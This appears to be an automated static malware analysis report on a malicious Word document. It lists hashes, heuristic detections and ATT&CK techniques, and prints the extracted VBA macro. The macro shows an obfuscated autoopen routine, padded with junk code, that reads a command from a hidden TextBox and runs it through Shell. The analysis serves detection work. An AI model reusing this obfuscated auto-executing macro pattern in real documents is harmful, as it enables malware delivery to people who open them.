Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bea2285be0232ccc…

MALICIOUS

Office (OLE)

Size: 87.5 KB
Created: 2018-12-13 09:54:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 2834f4545139ca5830131caaa40759f7
SHA-1: 38487e2d53132fa6c87984990e6d77046f02fa31
SHA-256: bea2285be0232ccc6ff21d158f58391fafebba4db6ce6c5d711c4b5954cd45e4
252 Risk Score

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is designed to execute automatically upon opening the document. Heuristics indicate a suspicious invocation of cmd.exe and a Shell() call within the VBA code, suggesting an attempt to run arbitrary commands. The ClamAV detection further confirms its malicious nature.

Heuristics 9

  • ClamAV: Doc.Trojan.Agent-6784316-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Agent-6784316-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     _
    .Shell(zvGMzbTsXdP, HjqNvZolnRk), QHKNzwhGE)
       Set FYIWjoombpttBpKW = bjhcjFFCSOtFwkDwrl
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    ihONzwcb
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9112 bytes
SHA-256: 86cf8eed85f3b7862b4a5608ae7e9f07c5c1bba5b105606f822eafa166cf8143
Detection
ClamAV: No threats found
Obfuscation or payload: likely
248 of 287 identifiers look randomly generated (e.g. 'HRIiLJDHvwzWsfkTjmwQGiwj') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KEdGFAwTPq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
ihONzwcb
End Sub

Attribute VB_Name = "kRCfABPW"
Function ihONzwcb()
On Error Resume Next
   Set qmmCtHUZSCICJOwraR = iFLSGSWtmwElLthShJrRZFab
   Select Case haUlPhJinIPfTfjXOibNQ
      Case 324049384
         cvRhjzYdijjZsBI = QuCYlRnOdHtLXzOSjS
         pwzajOikvjGrVFLKSOZXKIC = 26297805
         GNGfVRpZJSYRUTJGhri = QXFLpvDKuhhwvwcBYFa
      Case 119985208
         RMnnswvPQdQXjLiIu = CByte(ZNficlcWVqIhcRMHwLRXwz)
         viERYPnttiPAEkm = ChrW(CLWcEHjAwLYMXqXtcEjAY)
         DGiwODNRHWMbPMZUEo = Log(DSNqaWCHVXzBlKiHPuHsfnh)
   End Select
   Set wnufZitGKhEApGQjajzjA = dJQubAmJoOPjTzPJBwipri
   Select Case FqjQlZGiwiGJlPiCtTAsqkJ
      Case 258559764
         QQiCBKwvPKEsjBkhf = zModuXtpVrpDUjvwU
         bjvXHOWEZKJSQLK = 121730859
         admWGIMpHFLqXwkj = GzXZFaHpzjfCbisBVVV
      Case 225545471
         VYiiAIKOCNYmoFLvlUDihJ = CByte(jmjaToCbPwpkborFRzb)
         WGQmZjGjARDELzBwTiqZAmIn = ChrW(UkGuPmjGNCaVtBmhSawulZbm)
         ljGBujzcnFwAplfWwwzbaaj = Log(riLKtNvJTzdDaE)
   End Select
   Set IiSAXuFupJflDBnirbtv = LnrRpzHCwNAqIX
   Select Case pbZwZkKXpzJISnzt
      Case 211105721
         iwrajhvwrsvivvdbsQB = WPBPCSfrpOwUURiaTOrrDbsR
         KDOiqujskCOvbYRCDId = 319538121
         JdQDIiYKrvWknrOQMzT = bjPPfrpaozSPUAAa
      Case 328757651
         hQLhsGsKohDmrJKkzZO = CByte(XQowVscHPnqnSk)
         DAuqIWUDIWCHIFkAa = ChrW(wDRbNLAdkvAqPTHs)
         jFjFiDNjbTkUCim = Log(bWhzbniqimZCRHjAQ)
   End Select
   Set maXSEZzjYWtjRIjFim = DSstwzufSFpVWXAzJf
   Select Case ZRYofKBzkhuPZWRnBthaTK
      Case 298868784
         bjAXJQLXZsNFidMivzJw = pQzEkzDbFSOYrNwJdqT
         WpjIMIYhzfTAuIlTBS = 165502196
         HvUZzjnPQYRJpcBzj = sbaWcZzNdjccHLRCObUGJf
      Case 143304468
         QaOKKSHljLZzqlT = CByte(alDDnnQGsnOafcjNFSFCLpCL)
         qtwlTLcHZjYcRVdJHSX = ChrW(jGHiMsYfRkkirc)
         uUUYclSFvIlnwcsDXfHuklRZ = Log(mzqpvpkpYipntuSOALW)
   End Select
   Set dlkLEZGDKVQjSuA = hHzbivLHRfApLSRZifLu
   Select Case PqZPHivswUGHksitTbiactYY
      Case 113498868
         rDrBniFdRQYMWMPPTKuhaam = ODdUVWSAzOqrAwhXCGaN
         GEVLNZNijRRQMnjFlH = 310698091
         YOHVXPXdXfUzZJHwHJIzEWOz = aoJwSQwfPzrzAnwCkHD
      Case 322578593
         rCfkwczztBAKzwaNf = CByte(PWTKMPBHVKuUPKA)
         jliNUozhVvrmCrX = ChrW(ECoazhqPiqGoDYmpKrNojR)
         aWloQYPEinGQMWZGCvOid = Log(LiwIBbLiiFmRNENsaqTmc)
   End Select
Const HjqNvZolnRk = 0
   Set bwwiiKQqAYwcQnBZDYowQjP = ilncnKCDfwdNlKEXa
   Select Case TRoXthrjzufjdvhjAsWnC
      Case 278044175
         swTJoosTRWjNwbHsGl = NIYwTifEKMAmicv
         aZXCrEbOMwhjFsAQCvdNTAAb = 56007809
         iHQjzkCjjSiiPIjKjWAww = LkjmzhbaZwuHVTzdz
      Case 321539591
         ZMihUfUjJQdaLlRvfzLk = CByte(EGtmnInMMGXEQZFdDP)
         fBSJvViVEYSdnLL = ChrW(FouhWhTwKGWvMLSbkD)
         TmzzRFnioucjsEF = Log(oJhlwhWwpzmIsFrtkGsiHqdc)
   End Select
   Set HRIiLJDHvwzWsfkTjmwQGiwj = zXcJHishmEFjPUwwsHVQwc
   Select Case RMvmtBsYVZtOmawoU
      Case 45588062
         GafkRRAROabSsUHLwLrwjt = jKVGJXuTAJHVpmciVsji
         uGAtiPBcdIJMuvavLrtUHaJl = 334934910
         ZUhWFwPhpEUMiIsqX = wJurCiJBqKqTwP
      Case 308169282
         qhvGCMzNFWazMlbR = CByte(InpYhRwMEGFqWH)
         RSSLuQwlMhmjIKo = ChrW(iZRobFoIPzuwGr)
         jOVhuTQWlJCcqvlqBP = Log(WRESdMdJwzVAiU)
   End Select
   Set BURUJEVOnQpEJnlkNB = nqzIZTwIQqqGmKPCPPcIl
   Select Case DljRULHVtNwscjE
      Case 76430757
         AKvEXzJCttkWUltwfnLZIzm = uzcKtijwDXbzpD
         oZOaRXzYbDuwtsmjBYvJ = 172709507
         zJLKlSzJvJcGXzuZVd = YBHzlpGRoaZutFTaFOHlhbS
      Case 52329439
         UmUnobCSOCTsJZVfAIiVP = CByte(BEYpKOrNwizORDlizwWbi)
         zivplFjTjmVllP = ChrW(zRoaBFlsuIStWIkwn)
         zFptUcmhdzMsjR = Log(PAjhAdwOpAjTLJKzni)
   End Select
   Set vWwGpSZNIEOwJk = rdWMROTvaSdOqtj
   Select Case mWQECNsotRjbQzMLrDHbwb
      Case 237226298
         cbWnLDiTZPcatjEdkiTAhs = cFRXmmHsKlccarEcpiMB
         VlSLwdqNIjGkwt = 224083945
         jvhRXRoQDdlfGdSUqdGUzLo = QiCCWrdwWiJmfjd
      Case 28638696
         BHUrKHiRltTnNuUHYAtOmtMz = CByte(JYUjpHzCWzETRGWXllwKKI)
         oiGikpKIvVDBjJlvmTlqwQ = ChrW(GuWrAIOpdAkfBiYPMMpIwO)
         nNApLqZRrYqAnN = Log(KzhfaBzijNODYiHHprqjdASC)
   End Select
   Set vtkqFLBvJqJZnYtsIzlRji = rzTlrKRliFJibZrY
   Select Case UXwjPFpcQkJiklDMjs
      Case 292141864
         aKlrEiUiqSTQYQwMmjcsdI = ZHDuTFVujwmuKmEbklL
         zQsKUorazPAIRiLjBkAYVX = 253577099
         lVmahFrHRWdIPsZiO = vQwddcaUaAknQaiaYwCQsuY
      Case 295163743
         uEDUIKVJabVTIsKANfrWiGD = CByte(oUbcwBBsGniXXzRpOipw)
         HQGsQfPjWMoBYjn = ChrW(tKZacNVJmcONCHzQEVjEU)
         hWlMjatWwSdFVTQXjuvzF = Log(RBiOMYwDAjPIdDoQduPQiv)
   End Select
   Set cqGZpmzZUJpqljTAtjzKj = UziHPijJTnzZta
   Select Case CrlRotQCnwPlhPAvhDX
      Case 143157589
         qiXTsLpBtLpsZqp = ssLEvvIAtzuTsPWV
         RLINwvhbAtmZsHY = 71684979
         oKMRNvZXZtRVJdpUnHijw = wdcuCWaArVIIbLInEQjqYBQ
      Case 36341903
         PzFFzuikuOioSsDwZCwMACd = CByte(zDNwIVuNXDnZVura)
         YjzawlXjtzzUsqMTuGwj = ChrW(bZTVRPFdaiLVicWjlBRpQ)
         WvtiMaFboutwwHdEj = Log(SCTUowJOqnIFirRNCY)
   End Select
zvGMzbTsXdP = KEdGFAwTPq.TextBox1 + fOCjUwX + fYzqQ + BGuUwkSS + niTdYX + CfjEFc + bkcliUD + RhSEv + IzYGwKw
   Set DIBdUpNszShIXiwzGVLbun = MYOzqdcJINbwZRfZDH
   Select Case CFPnzjPvZLvctPlpEFsXPXJ
      Case 163926353
         vmZjbwHUAlRzlRQbiDwMlhj = bbTLjifwqtBtqOwOnHsdTs
         ocwjTKLJNGkFzdwkWG = 134858153
         rPWlTEjZdoCUjHi = nzLlijnnFJwlrXWXzlbZF
      Case 72349364
         PbmfYDPVrzNzYuic = CByte(bifJGwhGRfVwjEd)
         kwKrDOkpnGliZwcQITwW = ChrW(DJcFZGYuXLukUnwXkEMw)
         WzMDjTCEpNGGzhnimiHLvQ = Log(rtFKdtYOlYphJPBtnVqiwoi)
   End Select
   Set zLIRpZkbKqdXqaqlkUjzA = TvnwRGlRpNDUzYPcszzMEOS
   Select Case NlsMLavMlIsNdr
      Case 52654424
         ptBPTVcSWHbiwnmFdjkj = ZFPSrjofBzBpWWKM
         ksIapDwNOzVnku = 40870400
         PPnmzcmnmUIZscQcsaz = XnjCQEdlTsREvNGGWaFHFVo
      Case 142315917
         YUmjtvJvNEcflVszAUtCEii = CByte(KFRVrmBwOHskrEZzIJ)
         JdalFMIFAuTqupQWodoEa = ChrW(dRddIIvuwuvwVr)
         TMIihBEvRzuailTTEHGAJ = Log(bDAJFwZvzTYnURf)
   End Select
   Set RzSwPHhWNpkzpYHStsFG = qJowMYYYrSpsaPz
   Select Case TSwkjLwwoFDzawZZqWapi
      Case 340300686
         iJzWXuEPIJiaaI = biLsIGVbwtsQCDoIGT
         ObipbBkqunsYwRUvw = 200186405
         rwNhzciiBLTBcGMuusojq = QanFUtzhHsdUcSAtjNw
      Case 156788205
         iblQSmWaDHuvTfmuuIliT = CByte(aYHittAJbnSplz)
         pCHcHEliZJmNwo = ChrW(LtOaANIntcZufHc)
         tntEFdBLzpphUHjCUWbZ = Log(LznjOOziJGbzfsZFkzh)
   End Select
   Set qfiGJIzPsKoCKXjdq = RmdwHbaEkHYFAzKGIlHKiQN
   Select Case rJBZZmoLviYYorXCjEXqrn
      Case 63965433
         sDOuVjPBYoHwaAfwSMJWZmR = NEiZsWzEzKhVXtqPP
         zAkZcfZZYidnSFmzjR = 8230127
         ICqCwQTJaYWtHCmRhoczAT = TaMsbjaMZOaOzJhbMLPwzHkf
      Case 101768965
         UQsoBooEXclYraAMzi = CByte(ooHzNPnkVwLqhcIOJUkNl)
         smFpoUpwnKFwaiNRiZN = ChrW(TGMlEviLqrNRwP)
         VuXbTuXKBkjBiAspKzjFmZTl = Log(mdHvwnBLisXGzuJwvLBVtEK)
   End Select
   Set jCSflJofRDiNzUcP = CmRUoXdkWZHCjEP
   Select Case cqvTPftKwEwcUZlvLLfJIrv
      Case 206940933
         uOjhchzTVWdjvpXsGXkYAQ = nLrXYFilvQiVQKcUWzJwCIPP
         HRCTLGodRvWlJaNnli = 104387690
         THiiDNZrRufwbBQoj = jKpswOFjMZvLRZzwD
      Case 919567
         XQzjzLXQaJIJZHTwFbaJT = CByte(UBAvGdFwcwQFIBmdsjb)
         fZEPWDzatWcqPwwwjBEtKdhJ = ChrW(TwRMcjtiWtuwkZCffCFWaqJ)
         pwqchnBsvWCFjOR = Log(iItFBAvcBNfbbmSdpLWfsR)
   End Select
   Set jMJjaoUGTApfni = sZmHZKQnOoPOcwjWR
   Select Case WVhGVNutwHlGQBpcDwMwjuQ
      Case 165407933
         sLasHkiYoRIklEZNfLICIXN = zumKUHcEILcBUBrWHic
         jrSsnjDiIWmVzAtMwUDho = 27225177
         ZbXtiUluZvctHctWlDt = lZHETHiYnfuvbPsRQpYOWcMa
      Case 137218461
         mkEzRdvHqATTaXp = CByte(HuAhRrkcGvffZJMh)
         LVuUpNRAUZrwzPBYJURZn = ChrW(uAbrVwPhjnmjOCvsShjjwSs)
         JjiGQpvHvUatswsTkmsD = Log(NAzcQCkqHucHzhpT)
   End Select
sCBNWzzR = Array(SoRzEEpB, aTIaRI, YPUrl, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(zvGMzbTsXdP, HjqNvZolnRk), QHKNzwhGE)
   Set FYIWjoombpttBpKW = bjhcjFFCSOtFwkDwrl
   Select Case zzWFwViOwlLUwvCwDNlWSCTR
      Case 170204996
         hcFqzKEOWVFblGArHQGuwKwm = iGOdwjFfAoGIIoAPiYhscciW
         vCKfzXjSqOEqlapAvkS = 303392352
         zcGiNlOuXFcsCBduzARaq = awZwwrrjrMbswaEBl
      Case 246249698
         YSIcwjYLFvkATshBJ = CByte(RnXCqNQQJFDqwOj)
         SwRUbNZjllHLIAO = ChrW(uwUzuVbuMhZTHPzVUKa)
         jpdDOqQFFEIJqivBuiPwX = Log(ItnFYWnmqwZfpFTQjD)
   End Select
End Function